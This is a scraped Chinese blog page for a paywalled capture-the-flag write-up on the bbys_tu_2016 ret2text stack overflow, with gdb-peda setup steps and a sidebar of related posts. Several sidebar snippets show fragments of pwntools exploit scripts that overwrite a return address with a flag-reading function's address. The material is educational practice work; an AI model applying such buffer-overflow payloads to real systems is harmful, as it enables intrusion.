bbys_tu_2016(ret2text)

最新推荐文章于 2023-01-14 02:32:16 发布
最新推荐文章于 2023-01-14 02:32:16 发布
阅读量992 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441024/article/details/110350472
版权
本文介绍了在BBYS_TU_2016挑战中使用gdb-peda调试的一个ret2text漏洞利用过程。通过在main函数处设置断点,发现scanf函数对输入没有限制,从而可以构造任意长度的输入导致栈溢出。通过覆盖eip,执行shell地址,最终成功利用漏洞。这是一个简单的练习,但收获颇丰。
摘要由CSDN通过智能技术生成

BUUCTF bbys_tu_2016(ret2text)

在这里插入图片描述
毫无疑问地check一下
在这里插入图片描述
运行一下,发现并没有给我们什么有用的信息,这是第一次尝试用gdb-peda来做题,附上gdb-peda的安装方式:

$ git clone https://github.com/longld/peda.git ~/peda
$ echo "source ~/peda/peda.py" >> ~
最低0.47元/天 解锁文章
三哥sange
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[BUUCTF]PWN——bbys_tu_2016
mcmuyanga的博客
11-11 540
bbys_tu_2016 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况,测试时候发现输入长度过长程序会崩溃,猜测输入点存在问题 32位ida载入,检索程序里的字符串,发现有直接读出flag的函数可以利用 flag_addr=0x804856D main函数 没有限制v4的长度,存在溢出漏洞,覆盖ret为读出flag的地址即可 from pwn import * r=remote('node3.buuoj.cn',29593) flag_addr=0x
bbys_tu_2016
z1r0的博客
12-11 492
bbys_tu_2016 查看保护 溢出有后门,ida这次分析的不准确,在pwndbg里面动调一下得到偏移为0x14 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27430) else: r = process(file_name) elf = E
[BUUCTF-pwn]——bbys_tu_2016
Y_peak的博客
03-17 332
[BUUCTF-pwn]——bbys_tu_2016 简单的栈溢出,不过竟然是esp寻址,害的孩子找了好久还是要动态调试 一般地址会误差八个字节 error exploit from pwn import * #p = remote('node3.buuoj.cn',28360) p = process('./bbys_tu_2016') gdb.attach(p, "b *0x080485ED") flag = 0x0804856D payload = 'a' * (0xc + 4) + p32(fla
BUUCTF bbys_tu_2016&&xm_2019_awd_pwn2
doudoudedi
01-23 1031
在家希望武汉的师傅们一切都好~~ bbys_tu_2016 这道有点没搞清额额flag文件是flag.txt是能control但是好像不能ROP也是能读到flag文件的就很简单了还有似乎文件没写好setbuf函数不会先出现io流 exp: #!/usr/bin/python2 from pwn import * local=0 if local==1: p=process('../binary/...
bbys_tu_2016(write up)
m0_73756460的博客
01-14 101
【buuctf】刷题 bbys_tu_2016(write up)
ret2text
huzai9527的博客
02-02 148
1. buuoj-r2t3 检查保护,开启NX 寻找内存中存在的system函数地址 寻找函数的溢出点 这里构造的字符串长度超过int8的表示范围。如下图,只要后面八位在范围之内即可 exp from pwn import * context.log_level = 'debug' p = process('./r2t3') shell = 0x804858b # step 1 构造栈溢出 payload = b'a'*0x15 + p32(shell) # step 2
buuctf rip 1,ret2text解法
amber_o0k的博客
08-06 1295
from pwn import * io = remote("node4.buuoj.cn",27708) payload = b'a'* 23 + p64(0x40118a) io.sendline(payload) io.interactive() 87和8a两个地址都能奏效,往上往下都不行。
BUUCTF 周练 Week1
weixin_44229639的博客
11-03 2752
Week 1 Q1 axb_2019_brop64(这题本来是盲打,buuoj给了源文件难度减少了很多) ​ IDA分析发现,read函数长度存在栈溢出 ​ checksec结果,没有Canary和PIE,可直接利用栈溢出构造rop ​ 本题靶机使用的是Ubuntu16 ​ 使用libc-2.23.so (或者可使用LibcSearcher 寻找对应libc) 构造rop思路: ​ 在此之前 puts函数已被调用,其GOT表被覆盖为真实的函数地址,可利用ROPgadget 得到real_puts_
BUUCTF刷题1
m0_51251108的博客
05-19 347
BUUCTF刷题wp题目:babyheap_0ctf_2017:pwn2_sctf_2016:[ZJCTF 2019]EasyHeap:hitcontraining_uaf:babyfengshui_33c3_2016pwnable_orw:picoctf_2018_buffer overflow 2:xdctf2015_pwn200:jarvisoj_level1:ciscn_2019_n_3:bbys_tu_2016:inndy_rop:roarctf_2019_easy_pwn:mrctf2020_
BUUOJ PWN 41-60
2h4ox1n9
12-11 347
41、jarvisoj_level3_x64 本地没问题,jaroj也没问题,buu上说啥就是不行。。libc搜不到,奇了怪了,jaroj上不用选择版本直接就可以
buuctf pwn wp(第1.5波)学会用ELF语句进行AAAA(即本地做题目)
月阴荒的博客
03-24 571
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第二波,额还是很简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。) 这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。 另外声明,脚本有些来自于网络上(太简单的不想多看,太难的不会,除了中间那一档的也没哪些脚本是自己...
BUUCTF pwn水题大赏(六)
o琦野o的博客
03-11 332
BUUCTF pwn水题大赏suctf_2018_stack suctf_2018_stack 最最最最最最基本的栈溢出,也不知道为啥会这么高分。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28582) #p=process('./SUCTF_2018_stack') elf=ELF('./SUCTF_2018_stack') payload = 'a'*0x28+p64(0x0040067A)
2021-09-07 BUUCTF-PWN 刷题记录
m0_56897090的博客
09-07 579
2021-09-07 roarctf_2019_easy_pwn 0x00 题目分析 堆题 整体功能 增加 删除 修改 输出 保护情况: root@ubuntu:~## pwn checksec roa* [*] '/root/roarctf_2019_easy_pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE:
buuoj Pwn writeup 56-60
yongbaoii的博客
02-16 230
56 wustctf2020_getshell 保护 57 [V&N2020 公开赛]easyTHeap 保护 58 xdctf2015_pwn200 保护 59 ciscn_2019_n_3 保护 60 bbys_tu_2016 保护
入门到放弃系列 ret2text
weixin_43489686的博客
09-10 1473
ret2text 这道题目是一道入门级别的题目,主要还是熟悉堆栈原理和工具的使用,那么话不多说,开始看题。 做题的第一步,先看看这道题的基本逻辑,那把程序试运行一遍发现是简单的输入输出和很常规的嘲讽战术。既然有输入输出又是pwn题应该也是肯定有溢出漏洞的(强行推断)。 做题第二步,那再看看这个程序有没有什么保护措施,发现只开了一个堆栈不可执行的保护,总之就是这个程序相当不安全。同时还发现这个程序...
栈溢出总结+ret2text
MuMuLee_的博客
09-17 524
1、堆栈溢出原理 通俗的讲,栈溢出的原理就是不顾堆栈中分配的局部数据块大小,向该数据块写入了过多的数据,导致数据越界,结果覆盖了老的堆栈数据。 2、函数调用栈的结构和主要过程 图示: 文字说明: 汇编代码 push 参数 3 #参数由右向左入栈 push 参数 2 push 参数 1 call 函数地址 #push当前指令位置,跳转到所调用函...
flag{}的格式是这样的
最新发布
05-27
k = 13: zzzuzkzyyvhdvdzdvldvdzvddxducydazzayf5dv9BBys;iz;vhvezd=sduzdz=sdu=d9zzzzazcz k = 14: aavvalazzwieewaewmeweaweeylevzedbabzg6ew:<CCzt<j{ifweAtevAewAte>eazaaabad k = 15: ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值